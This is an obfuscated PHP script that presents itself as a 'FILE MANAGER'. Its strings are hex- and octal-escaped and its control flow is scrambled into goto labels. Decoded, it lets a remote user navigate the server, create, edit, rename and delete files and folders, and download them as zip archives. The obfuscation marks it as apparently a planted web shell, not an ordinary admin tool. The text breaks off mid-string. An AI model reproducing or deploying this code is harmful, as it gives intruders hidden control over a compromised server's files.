QW5Y8; DHKiH: onBbV: goto uXjP6; nA5BN: $_SESSION["\143\x75\162\162\145\x6e\x74\137\144\x69\162"] = o6VEI($a8u65); goto e0TeF; lc91V: goto ABa8W; goto bwG06; ZWRA5: Zm0of: goto Geji6; zz_Vc: if (@mkdir($gMlMH, 0755)) { goto J3RxO; } goto FxnQn; tUXtg: $uzhX9 = "\x43\x72\145\x61\164\x65\40\146\x61\x69\154\145\144\72\x20\103\x6f\165\154\x64\x20\x6e\157\164\x20\143\x72\145\141\164\145\40\146\151\154\145"; goto IcpMT; ify_d: goto jqvB0; goto dnzzL; N1t8E: $x0vZt = O6Vei($_SESSION["\x63\165\162\x72\x65\156\164\x5f\144\151\x72"] . DIRECTORY_SEPARATOR . $_POST["\x72\x65\155\x6f\x76\x65"]); goto BEDfw; PEzLd: $ebCMv = $_POST["\x72\x65\156\141\155\145"] ?? null; goto FfvL_; LZmru: CuxB4: goto pEryf; BzMvd: if (!(!is_dir($a8u65) || !is_writable($a8u65))) { goto iTgGv; } goto uUEnN; QcLa1: xsRzz: goto AFFv7; xKoI0: echo "\x22\x3e\15\xa\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\74\164\145\170\164\x61\162\145\x61\40\x6e\141\x6d\145\x3d\42\146\x69\x6c\145\137\143\x6f\156\x74\145\x6e\x74\x22\x20\151\x64\x3d\42\145\144\x69\164\157\162\55\143\157\156\164\145\x6e\x74\x22\x20\163\x74\x79\154\145\75\42\x64\x69\163\x70\154\141\x79\x3a\x6e\157\x6e\x65\x3b\42\x3e"; goto YLIuH; k3PS5: @ini_set("\x6c\157\x67\137\145\162\162\x6f\162\x73", "\61"); goto sfYm7; Ur15C: if (!$FNVfK) { goto TrqeU; } goto f30Sk; Z9WLM: @unlink($tDWqL); goto ufaT4; XlBi3: $HsbRa = rtrim($a8u65, "\x2f\134") . DIRECTORY_SEPARATOR . $r20dt; goto rqKIJ; MGOO_: g1hF0: goto tRwuu; ySeb2: b823h: goto bRQIt; i8Gov: $r20dt = EYRCA($_POST["\143\x72\x65\x61\x74\x65\137\x66\x69\154\145"]); goto lPbaI; lN9hx: if ($fzbkj === false) { goto mJ68V; } goto zTdTT; UYTTz: $a8u65 = $_POST["\156\x61\166\x69\147\x61\x74\x65"]; goto IIC1k; HPZuV: $uzhX9 = "\103\162\145\x61\164\145\x20\x66\141\x69\154\x65\x64\x3a\40\x44\x69\x72\145\143\x74\x6f\x72\171\x20\x6e\157\164\x20\167\162\151\x74\x61\142\154\145"; goto h08bA; B7RNP: $l45RL = array_merge($jzhHU, $DES8d); goto Aiwax; r5ar2: if (!$pnUrl) { goto Z6Cwe; } goto cv8Yl; qnmkE: if (!$YKJaG) { goto K0yxc; } goto pxf9S; c7ASk: U96_Q: goto kH1PM; YfIl0: $uzhX9 = "\104\x6f\167\156\154\157\x61\x64\x20\146\x61\x69\x6c\145\144\x3a\40\x43\x6f\x75\154\x64\40\156\157\164\x20\143\x72\145\141\164\145\40\172\151\x70\x20\146\151\x6c\x65"; goto Jiy2N; fIvv6: session_start(); goto HtfNf; PruBO: K0yxc: goto jSJqd; kuqTW: if (file_exists($R4MJ2)) { goto CuxB4; } goto I9k05; YVmVL: qyxzL: goto N72Pp; PbJYH: if (is_dir($mTJ38)) { goto g6Xo2; } goto gQQQc; OsjFJ: $i2cFz = basename($x0vZt) . "\x5f" . time() . "\56\172\151\160"; goto Ig3Qh; rDLiH: $uzhX9 = "\103\x72\x65\141\164\145\40\x66\x61\x69\154\145\x64\x3a\40\x49\x6e\x76\141\x6c\x69\x64\x20\146\157\154\x64\x65\x72\x20\x6e\x61\x6d\145"; goto n9U7P; Blqis: AyvEs: goto NnvCU; zthCK: echo "\74\x21\104\x4f\103\x54\131\x50\x45\40\x68\164\x6d\x6c\76\xd\12\74\x68\x74\155\x6c\x3e\15\12\x3c\150\x65\x61\144\76\xd\12\x20\40\x20\40\74\x6d\x65\164\x61\x20\143\150\x61\x72\x73\x65\164\x3d\x22\x55\124\x46\x2d\x38\x22\76\15\xa\x20\40\40\40\x3c\155\145\164\141\40\x6e\141\x6d\145\75\x22\166\x69\x65\x77\x70\x6f\x72\164\42\x20\x63\x6f\x6e\164\145\156\164\x3d\x22\167\x69\144\x74\x68\x3d\144\x65\166\151\x63\x65\55\x77\151\x64\x74\x68\54\40\x69\x6e\151\x74\x69\x61\154\55\x73\143\x61\154\145\75\x31\x2e\x30\x22\x3e\xd\xa\40\x20\40\40\x3c\164\x69\x74\x6c\145\x3e\106\x49\114\105\40\x4d\101\x4e\x41\107\105\122\74\x2f\164\x69\164\154\145\x3e\15\xa\40\40\x20\40\x3c\163\164\171\154\x65\76\xd\12\x20\x20\x20\40\40\x20\40\x20\52\40\x7b\15\12\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\155\141\x72\x67\x69\156\72\40\x30\73\15\12\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x70\141\x64\144\x69\156\x67\x3a\x20\x30\x3b\xd\12\40\x20\40\40\x20\x20\40\40\x20\x20\40\40\142\x6f\170\x2d\x73\x69\172\151\156\147\x3a\x20\142\157\x72\144\x65\x72\x2d\x62\157\x78\x3b\15\12\40\x20\x20\40\40\x20\40\x20\x7d\15\12\40\x20\x20\40\40\40\40\40\xd\xa\40\40\40\40\x20\40\x20\x20\x62\157\144\171\40\x7b\xd\xa\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\142\141\x63\153\147\x72\157\x75\156\x64\72\x20\x23\61\x61\x31\142\61\145\x3b\15\xa\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x63\157\154\x6f\x72\72\40\43\x65\x34\x65\x36\x65\142\73\15\xa\x20\40\40\40\40\40\40\x20\x20\40\x20\40\x66\x6f\156\164\55\x66\141\155\151\x6c\171\72\x20\55\141\x70\x70\x6c\x65\x2d\163\x79\163\x74\145\x6d\x2c\40\102\x6c\151\x6e\153\x4d\141\x63\x53\x79\x73\x74\145\155\106\157\156\x74\54\40\47\123\145\x67\157\145\40\125\x49\47\x2c\40\x73\171\163\164\x65\155\x2d\x75\151\54\x20\163\141\156\163\x2d\163\145\162\151\146\73\15\12\40\x20\x20\40\40\40\x20\x20\40\40\x20\x20\146\x6f\x6e\164\55\x73\151\172\145\72\x20\x31\63\160\170\x3b\15\12\40\x20\40\x20\40\40\40\40\x20\x20\40\40\x6c\x69\x6e\145\55\150\x65\151\x67\150\x74\72\x20\61\x2e\65\73\15\xa\40\40\x20\40\40\x20\x20\40\x20\x20\40\40\x6d\x69\x6e\x2d\x68\x65\151\147\150\x74\72\40\61\x30\x30\x76\150\x3b\15\xa\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\160\141\x64\144\x69\156\x67\x3a\40\x32\x30\x70\170\73\xd\xa\x20\40\x20\40\x20\40\40\40\175\15\12\x20\x20\40\40\40\x20\40\x20\xd\12\x20\x20\x20\x20\40\40\40\40\x2e\143\x6f\x6e\164\141\151\x6e\145\162\40\173\15\xa\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\155\x61\x78\55\167\x69\144\164\x68\72\x20\61\x32\60\x30\160\x78\73\xd\xa\x20\40\40\40\x20\40\40\40\40\x20\x20\40\155\x61\162\147\151\x6e\x3a\x20\x30\x20\141\165\164\x6f\x3b\xd\12\x20\40\x20\40\40\40\40\40\175\xd\12\x20\40\x20\40\40\x20\x20\40\xd\xa\40\40\x20\40\40\40\40\40\x68\x31\40\173\15\xa\x20\40\40\x20\40\x20\x20\40\x20\40\x20\40\x66\157\x6e\164\55\163\151\x7a\145\x3a\x20\x31\x36\160\x78\73\xd\12\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x66\157\156\164\x2d\x77\x65\x69\x67\150\x74\72\40\x35\x30\60\x3b\15\xa\40\x20\x20\40\x20\40\40\40\x20\40\40\40\143\157\x6c\x6f\x72\72\40\43\145\x34\145\66\145\142\73\xd\xa\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\x6d\141\x72\x67\x69\x6e\55\142\157\164\x74\x6f\155\x3a\x20\x34\160\x78\73\15\xa\40\x20\40\40\x20\x20\x20\40\40\x20\x20\40\154\x65\x74\x74\145\162\55\163\160\x61\143\151\156\x67\x3a\x20\55\60\x2e\60\61\x65\155\73\15\12\40\40\40\40\40\x20\40\40\x7d\xd\xa\40\x20\x20\40\x20\x20\40\x20\xd\12\40\40\x20\x20\x20\40\x20\40\x2e\x73\165\142\x74\151\164\x6c\x65\40\x7b\xd\12\x20\40\40\x20\40\40\x20\40\40\40\x20\40\143\x6f\154\157\x72\x3a\x20\43\x39\143\141\63\x61\x66\73\xd\xa\40\x20\40\40\40\40\x20\40\40\x20\40\x20\x66\157\x6e\x74\x2d\163\151\x7a\145\x3a\40\x31\63\x70\170\x3b\xd\xa\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\x6d\x61\162\147\x69\156\55\142\157\164\x74\x6f\x6d\x3a\x20\62\60\160\x78\x3b\15\xa\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x66\x6f\156\164\x2d\167\x65\151\x67\150\164\72\x20\64\x30\x30\x3b\xd\xa\40\40\x20\x20\x20\40\x20\40\x7d\xd\12\40\40\40\x20\40\40\x20\x20\15\12\x20\40\40\40\x20\x20\40\x20\56\141\154\x65\162\x74\x20\x7b\xd\xa\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\x70\x61\144\x64\151\156\147\72\x20\x31\x30\x70\170\40\61\62\160\x78\x3b\15\xa\x20\40\40\40\40\40\40\x20\40\40\40\x20\x62\x6f\x72\144\x65\162\55\x72\141\144\151\165\x73\72\40\64\160\x78\x3b\xd\12\40\40\40\40\x20\40\x20\x20\40\40\x20\x20\x6d\x61\x72\147\151\x6e\x2d\142\157\x74\x74\157\x6d\x3a\x20\61\62\x70\x78\73\15\12\40\40\40\x20\40\40\40\x20\x20\40\40\40\x66\x6f\156\164\55\163\151\x7a\145\72\40\x31\63\160\x78\73\xd\xa\x20\40\40\x20\x20\x20\x20\40\40\x20\40\x20\x62\157\x72\x64\145\162\x3a\40\61\160\x78\x20\x73\x6f\154\151\x64\73\15\12\x20\40\x20\x20\40\x20\x20\x20\175\15\xa\x20\40\40\40\40\x20\x20\x20\15\xa\40\40\x20\x20\40\x20\x20\x20\56\x61\x6c\145\x72\x74\55\x73\165\x63\x63\145\163\163\x20\x7b\xd\xa\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\142\x61\143\x6b\x67\162\157\165\156\x64\x3a\40\162\147\142\141\x28\x33\64\54\40\61\x39\67\54\40\x39\x34\54\x20\x30\56\x31\x29\73\xd\xa\40\40\x20\x20\x20\40\40\40\40\x20\40\40\142\157\162\x64\x65\162\55\143\157\154\x6f\x72\72\40\x72\x67\142\x61\50\x33\x34\54\x20\x31\x39\x37\54\40\x39\64\54\40\60\x2e\x33\x29\73\15\12\40\40\x20\40\40\40\40\x20\x20\40\40\40\143\x6f\x6c\157\x72\x3a\40\43\62\62\x63\x35\65\145\x3b\xd\12\40\40\40\40\40\x20\x20\x20\x7d\xd\xa\x20\x20\40\x20\40\40\x20\x20\15\xa\40\x20\x20\x20\x20\40\x20\40\x2e\x61\x6c\x65\x72\x74\55\144\x61\156\x67\x65\162\x20\173\xd\12\x20\40\40\40\40\40\40\40\x20\x20\x20\x20\142\141\x63\x6b\147\162\x6f\165\156\x64\72\40\x72\x67\142\141\x28\62\x33\71\54\40\x36\70\54\40\66\x38\x2c\x20\60\x2e\x31\x29\x3b\xd\12\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\142\x6f\x72\x64\x65\162\x2d\x63\x6f\x6c\x6f\162\x3a\40\x72\147\142\x61\50\x32\x33\x39\x2c\x20\x36\x38\54\40\x36\x38\x2c\40\x30\x2e\x33\x29\x3b\xd\12\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\143\157\x6c\157\162\x3a\40\x23\145\146\x34\x34\64\x34\x3b\15\12\x20\x20\x20\40\x20\40\x20\40\x7d\xd\xa\40\40\40\x20\40\40\40\40\15\12\40\x20\40\x20\40\40\40\40\x2e\163\145\x63\164\151\157\x6e\40\173\xd\12\x20\x20\x20\x20\40\40\40\40\40\40\40\40\142\x61\x63\x6b\147\162\x6f\x75\x6e\x64\72\40\162\x67\x62\141\50\x32\65\x35\x2c\40\x32\x35\65\54\40\x32\x35\x35\x2c\x20\60\x2e\x30\x33\x29\x3b\15\xa\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\142\157\162\144\x65\x72\72\40\61\x70\170\40\x73\x6f\154\151\144\40\x72\147\x62\141\50\x32\x35\65\x2c\40\62\x35\65\x2c\40\x32\x35\65\54\x20\x30\56\60\x38\x29\x3b\xd\xa\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\x62\157\x72\144\145\x72\55\162\x61\144\x69\x75\x73\x3a\x20\x34\160\170\73\15\12\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\160\x61\x64\x64\151\156\x67\72\x20\61\64\x70\x78\x3b\15\12\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\155\x61\162\147\x69\x6e\55\x62\157\164\164\x6f\155\x3a\40\61\62\160\170\x3b\xd\xa\40\x20\x20\x20\x20\x20\x20\x20\175\xd\xa\x20\x20\40\x20\x20\40\40\40\15\xa\x20\x20\40\40\x20\x20\40\40\56\x73\145\x63\x74\151\157\x6e\x2d\164\x69\x74\154\x65\x20\173\xd\xa\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\146\157\156\x74\55\163\x69\172\145\x3a\40\x31\63\x70\x78\73\xd\12\40\40\x20\40\40\40\x20\x20\x20\40\40\x20\146\157\156\x74\x2d\x77\x65\x69\147\150\164\72\x20\x35\60\60\x3b\15\12\40\40\x20\40\40\x20\40\40\40\x20\x20\x20\x63\x6f\154\157\162\x3a\40\43\145\64\x65\x36\x65\142\x3b\15\12\40\x20\40\40\40\x20\40\x20\x20\40\40\x20\155\x61\162\147\x69\x6e\x2d\142\x6f\x74\x74\157\155\x3a\40\61\x30\160\x78\x3b\15\xa\x20\x20\40\40\x20\x20\x20\40\x7d\15\xa\40\x20\x20\x20\x20\x20\40\40\15\12\x20\x20\x20\40\x20\x20\40\x20\x2e\x69\156\x70\165\164\55\x67\162\x6f\165\160\40\x7b\xd\12\40\x20\40\x20\40\40\40\40\x20\40\x20\40\144\x69\x73\x70\x6c\x61\171\72\x20\x66\x6c\x65\x78\73\15\xa\x20\40\x20\x20\x20\40\x20\40\40\x20\40\40\x67\141\160\x3a\40\x36\x70\x78\73\xd\12\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x6d\x61\x72\147\x69\156\x2d\x62\x6f\x74\164\157\x6d\x3a\x20\66\160\170\x3b\xd\12\x20\40\40\40\40\x20\40\x20\x7d\15\12\40\x20\40\40\x20\40\x20\40\15\xa\40\x20\40\40\40\x20\40\40\x2e\x69\156\x70\165\164\x2d\x67\162\157\165\x70\x3a\154\x61\163\164\x2d\143\x68\151\x6c\144\40\x7b\15\xa\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x6d\141\162\147\151\156\x2d\x62\157\164\x74\x6f\155\x3a\40\x30\73\xd\xa\40\40\x20\x20\40\x20\40\40\175\xd\xa\x20\40\40\x20\x20\40\40\x20\xd\12\40\x20\40\x20\x20\40\x20\x20\x69\x6e\x70\165\164\133\164\171\x70\145\75\42\164\x65\x78\164\42\x5d\54\xd\xa\x20\x20\40\x20\40\40\x20\40\151\x6e\160\165\x74\x5b\164\171\160\145\x3d\x22\x66\x69\x6c\145\x22\135\54\xd\12\x20\40\x20\x20\x20\40\x20\40\164\x65\170\164\141\x72\x65\x61\x20\x7b\15\xa\x20\40\x20\x20\40\40\40\40\40\40\x20\40\x62\x61\x63\153\147\x72\157\165\156\x64\72\40\x72\147\x62\141\50\60\x2c\40\60\x2c\40\60\54\x20\x30\56\62\x29\x3b\15\xa\40\x20\40\40\x20\x20\40\40\40\x20\x20\x20\x62\157\x72\144\x65\162\x3a\40\61\160\170\x20\x73\157\154\151\144\x20\162\147\142\x61\x28\x32\65\x35\54\x20\x32\x35\65\54\40\x32\65\x35\x2c\40\x30\x2e\x31\x29\x3b\15\xa\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\142\x6f\162\144\x65\x72\x2d\x72\141\x64\151\x75\x73\72\40\x34\160\x78\73\15\xa\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x70\x61\x64\144\x69\x6e\147\72\40\x36\x70\170\x20\x31\60\x70\x78\x3b\15\12\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\x63\x6f\154\x6f\x72\72\x20\x23\145\64\x65\66\x65\x62\x3b\15\xa\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\146\x6f\156\x74\x2d\x66\141\x6d\x69\x6c\171\x3a\x20\x2d\141\x70\160\154\x65\55\163\171\x73\164\145\155\x2c\40\102\x6c\151\156\x6b\115\x61\143\x53\171\x73\x74\145\155\x46\157\x6e\164\x2c\x20\x27\123\x65\147\x6f\x65\40\125\111\x27\54\x20\163\x79\163\x74\145\x6d\55\165\151\x2c\40\163\141\156\163\55\163\x65\x72\x69\146\x3b\xd\12\40\40\x20\x20\40\x20\40\40\40\40\40\40\x66\157\x6e\164\x2d\163\151\x7a\x65\72\x20\61\x33\x70\170\x3b\15\12\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x74\162\141\156\163\151\164\x69\157\x6e\x3a\40\x61\154\x6c\x20\60\56\x31\65\x73\40\x65\x61\x73\145\73\xd\xa\x20\40\40\x20\x20\40\x20\40\x20\40\x20\x20\157\165\164\x6c\151\x6e\145\x3a\x20\x6e\157\156\145\x3b\xd\12\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x66\154\x65\170\72\40\x31\x3b\xd\12\x20\40\x20\40\40\40\x20\40\175\xd\12\x20\40\40\x20\x20\40\40\40\xd\xa\40\x20\x20\x20\x20\40\40\x20\x69\x6e\x70\x75\164\133\164\171\x70\x65\75\x22\x74\x65\170\164\42\x5d\72\146\157\x63\x75\x73\x2c\xd\12\x20\40\40\x20\x20\40\40\40\164\x65\170\164\141\162\x65\x61\x3a\x66\x6f\143\165\163\40\173\xd\xa\40\40\40\x20\40\40\x20\x20\x20\40\40\40\x62\x6f\162\x64\145\x72\55\x63\157\x6c\x6f\162\72\40\x72\x67\142\141\50\x32\65\65\54\x20\62\65\65\x2c\40\x32\x35\x35\x2c\40\x30\x2e\62\x29\73\xd\12\40\40\x20\40\40\x20\x20\x20\40\40\40\40\x62\x61\x63\153\147\162\157\x75\156\x64\x3a\40\x72\147\142\x61\x28\60\x2c\40\60\x2c\40\x30\x2c\40\x30\x2e\63\51\73\15\12\x20\40\40\x20\x20\x20\40\40\175\15\12\40\x20\x20\40\40\40\x20\40\xd\12\40\x20\x20\x20\x20\40\40\40\x69\x6e\160\x75\164\x5b\x74\171\x70\145\x3d\x22\x66\151\x6c\145\42\135\40\173\xd\xa\40\x20\x20\40\40\x20\x20\40\40\40\x20\x20\143\165\162\x73\157\x72\72\x20\x70\157\151\x6e\x74\145\x72\x3b\xd\xa\x20\40\40\40\40\40\40\x20\40\40\x20\40\x70\x61\x64\x64\x69\x6e\147\x3a\40\66\160\170\x20\61\x30\x70\x78\x3b\xd\xa\40\x20\40\x20\x20\x20\x20\x20\x7d\15\12\x20\x20\40\x20\40\x20\40\x20\15\xa\40\x20\x20\40\40\x20\40\40\x69\156\160\x75\164\x5b\x74\171\160\x65\75\x22\146\x69\x6c\145\x22\135\x3a\72\146\x69\x6c\145\x2d\x73\x65\154\x65\143\164\x6f\x72\55\x62\x75\164\x74\x6f\x6e\40\173\xd\xa\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x62\x61\143\x6b\x67\162\x6f\165\x6e\144\x3a\40\x72\x67\142\x61\x28\62\x35\x35\54\x20\62\65\65\x2c\x20\62\x35\65\54\40\60\56\x30\66\51\73\xd\12\x20\40\40\x20\x20\40\40\40\40\x20\40\x20\143\157\x6c\157\x72\72\x20\43\145\x34\145\x36\145\x62\73\xd\xa\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\x62\x6f\162\x64\145\x72\x3a\40\x31\x70\170\40\x73\x6f\x6c\151\144\x20\162\147\142\141\x28\x32\65\x35\54\x20\x32\65\x35\54\40\x32\65\65\x2c\40\60\56\x31\51\73\15\12\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\142\157\162\x64\145\x72\55\x72\141\144\x69\x75\163\x3a\x20\64\160\x78\73\xd\12\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\160\x61\x64\x64\151\156\x67\x3a\x20\x36\160\170\40\61\x32\160\x78\73\15\12\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\146\x6f\156\x74\55\x73\151\172\145\72\x20\x31\x33\x70\x78\73\15\xa\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\x66\157\156\x74\55\x77\145\151\x67\x68\x74\x3a\40\64\60\60\x3b\xd\12\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x63\x75\162\163\157\162\72\x20\160\157\x69\x6e\x74\x65\x72\73\xd\12\x20\x20\40\40\40\x20\40\40\x20\40\x20\x20\164\x72\x61\156\163\151\164\x69\157\x6e\72\40\141\x6c\x6c\40\60\56\61\x35\163\40\145\x61\x73\145\73\xd\12\x20\40\40\x20\40\40\x20\40\40\40\40\40\146\x6f\156\x74\x2d\146\141\155\151\154\x79\x3a\x20\x2d\x61\x70\160\154\145\55\x73\x79\163\x74\145\x6d\54\x20\x42\x6c\151\156\153\115\x61\143\123\171\x73\x74\145\x6d\106\157\x6e\164\x2c\x20\x27\123\145\x67\x6f\x65\x20\125\x49\x27\54\x20\163\x79\x73\164\145\x6d\55\x75\x69\54\x20\163\x61\156\x73\55\x73\145\x72\151\x66\x3b\15\12\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\155\x61\162\x67\151\x6e\55\162\151\x67\x68\164\x3a\x20\x31\60\x70\170\x3b\xd\xa\x20\x20\40\x20\x20\40\40\x20\175\15\12\40\40\40\x20\40\40\x20\x20\15\12\x20\40\40\40\x20\40\x20\x20\x69\156\x70\x75\164\x5b\164\x79\x70\145\x3d\42\146\151\154\x65\42\135\x3a\72\146\151\x6c\x65\55\x73\x65\154\145\143\x74\157\162\55\x62\x75\164\x74\x6f\x6e\x3a\x68\157\166\145\x72\40\173\15\xa\x20\40\40\x20\40\40\x20\x20\40\40\40\40\x62\x61\x63\x6b\147\162\157\x75\156\x64\x3a\x20\162\x67\x62\x61\x28\62\65\65\54\x20\62\x35\x35\x2c\x20\x32\x35\65\54\40\60\x2e\x31\51\x3b\15\12\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\142\x6f\x72\x64\x65\x72\x2d\x63\157\154\157\x72\x3a\40\x72\x67\142\x61\x28\62\65\65\x2c\40\62\x35\x35\54\x20\62\65\x35\54\x20\x30\56\61\x35\x29\x3b\15\12\x20\x20\40\x20\40\40\x20\40\x7d\15\12\40\x20\x20\40\x20\40\x20\x20\xd\12\x20\40\x20\x20\x20\40\40\x20\x74\x65\170\x74\141\162\145\x61\40\x7b\15\xa\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\146\x6f\x6e\x74\x2d\146\x61\155\151\154\x79\x3a\x20\x27\123\106\x20\115\157\156\157\x27\x2c\x20\x4d\x6f\156\141\143\x6f\54\x20\x27\103\141\x73\x63\141\144\151\141\40\x43\x6f\x64\145\x27\x2c\x20\x27\x52\x6f\x62\157\164\x6f\40\115\157\x6e\157\47\54\40\103\157\x6e\163\157\154\141\163\x2c\40\x27\103\x6f\165\162\151\x65\x72\x20\x4e\145\x77\x27\54\x20\x6d\x6f\x6e\x6f\x73\160\141\x63\x65\73\xd\xa\x20\40\40\40\40\x20\40\40\40\40\x20\x20\162\x65\x73\151\x7a\x65\72\40\x76\145\x72\x74\x69\x63\x61\154\x3b\xd\xa\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x6d\x69\156\55\x68\145\x69\147\150\164\x3a\x20\x34\60\x30\x70\x78\73\xd\xa\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x68\x65\151\147\150\164\x3a\40\x35\60\x30\x70\170\x3b\xd\xa\x20\x20\40\40\40\40\40\40\40\x20\40\40\154\x69\156\x65\x2d\150\145\x69\x67\x68\164\x3a\x20\x31\56\x35\73\15\xa\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x66\x6f\x6e\164\x2d\163\151\172\145\72\x20\x31\x32\x70\x78\73\xd\xa\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\167\x69\x64\164\150\72\40\61\60\x30\x25\x3b\xd\xa\x20\40\40\40\40\x20\x20\x20\40\x20\40\x20\x64\x69\163\x70\154\x61\x79\72\x20\142\154\x6f\x63\153\x3b\xd\xa\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x73\143\x72\x6f\x6c\x6c\x62\141\162\55\167\151\144\164\150\72\x20\164\150\x69\x6e\x3b\15\xa\40\40\x20\40\x20\40\40\40\x20\40\x20\40\x73\x63\162\x6f\154\x6c\x62\x61\162\x2d\x63\157\154\157\x72\72\40\x72\147\x62\x61\50\62\x35\x35\x2c\40\62\x35\x35\54\40\62\x35\65\54\40\60\x2e\x32\x29\40\x72\147\x62\141\x28\x30\x2c\x20\60\54\40\60\x2c\40\x30\x2e\63\x29\73\15\xa\x20\x20\x20\x20\40\x20\x20\40\x7d\xd\12\40\40\40\x20\x20\x20\x20\40\xd\xa\40\40\x20\x20\x20\x20\40\40\164\x65\170\x74\x61\x72\x65\141\x3a\72\55\167\145\x62\153\151\x74\x2d\163\x63\x72\x6f\x6c\x6c\142\141\x72\40\173\15\xa\40\40\40\40\40\40\40\40\x20\40\40\40\x77\151\x64\x74\150\x3a\40\x31\x30\x70\170\73\15\xa\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x68\145\x69\x67\x68\x74\72\x20\x31\60\x70\x78\x3b\15\xa\x20\40\40\x20\40\x20\40\40\175\xd\12\x20\x20\40\40\40\40\x20\x20\xd\xa\x20\x20\x20\40\x20\x20\40\40\x74\145\170\164\141\162\x65\141\72\x3a\55\167\x65\142\x6b\151\164\x2d\163\x63\x72\x6f\x6c\154\142\141\162\x2d\164\x72\141\x63\x6b\x20\x7b\15\12\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\142\141\143\153\147\162\x6f\x75\x6e\x64\72\x20\162\147\x62\x61\x28\x30\x2c\40\x30\x2c\40\60\x2c\x20\x30\56\x33\x29\73\xd\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x62\157\x72\x64\145\162\55\162\141\144\151\x75\163\x3a\x20\x34\160\x78\x3b\15\xa\x20\40\x20\40\40\x20\40\40\175\xd\xa\40\x20\x20\x20\x20\40\x20\40\xd\12\x20\x20\x20\40\x20\x20\40\x20\x74\145\170\164\141\x72\145\x61\72\72\55\167\145\x62\x6b\151\x74\x2d\x73\x63\162\x6f\x6c\154\x62\141\162\x2d\164\150\165\x6d\142\40\173\15\12\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x62\x61\x63\153\147\x72\x6f\x75\x6e\144\x3a\40\x72\x67\x62\x61\50\x32\x35\x35\54\x20\x32\65\x35\54\40\62\x35\65\x2c\40\x30\56\62\51\73\xd\12\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\x62\x6f\162\x64\145\162\x2d\x72\141\144\151\x75\163\x3a\x20\64\160\170\73\xd\xa\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\142\x6f\162\144\145\x72\72\x20\x32\x70\170\x20\x73\x6f\154\x69\144\x20\x72\147\x62\141\50\x30\x2c\x20\x30\x2c\x20\x30\x2c\40\x30\x2e\x33\x29\73\15\12\x20\x20\40\x20\x20\x20\x20\40\x7d\15\12\40\x20\40\40\x20\40\x20\x20\xd\12\40\40\x20\40\x20\x20\40\40\x74\x65\170\x74\141\x72\145\x61\72\x3a\55\x77\145\142\x6b\151\x74\55\x73\x63\x72\x6f\x6c\x6c\x62\141\x72\x2d\164\x68\x75\155\x62\x3a\x68\157\x76\145\x72\x20\x7b\xd\xa\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\x62\141\143\x6b\x67\x72\x6f\165\x6e\x64\72\40\x72\x67\x62\x61\x28\x32\x35\65\54\x20\62\65\x35\54\40\62\65\65\54\x20\60\56\63\51\x3b\xd\12\40\x20\40\x20\x20\40\x20\x20\x7d\xd\12\40\x20\40\x20\x20\40\x20\40\15\xa\x20\x20\40\x20\x20\40\40\x20\x2e\x62\164\156\40\x7b\xd\12\40\x20\40\x20\40\40\40\40\x20\40\40\x20\x62\141\x63\x6b\147\162\157\x75\x6e\x64\x3a\40\x72\147\x62\x61\50\62\x35\x35\x2c\x20\62\65\65\x2c\40\62\x35\65\54\40\x30\56\x30\x36\51\x3b\xd\xa\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\143\x6f\x6c\157\x72\72\40\43\145\64\145\x36\145\142\73\xd\12\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\x62\157\x72\144\145\x72\72\x20\61\x70\170\x20\163\157\154\x69\144\x20\x72\147\142\141\x28\x32\65\x35\54\x20\x32\x35\x35\x2c\x20\62\x35\x35\54\40\60\x2e\61\51\x3b\xd\xa\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\142\x6f\x72\144\x65\162\55\162\x61\144\151\165\163\72\40\x34\160\170\x3b\xd\12\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x70\141\x64\144\151\x6e\x67\72\40\66\x70\170\x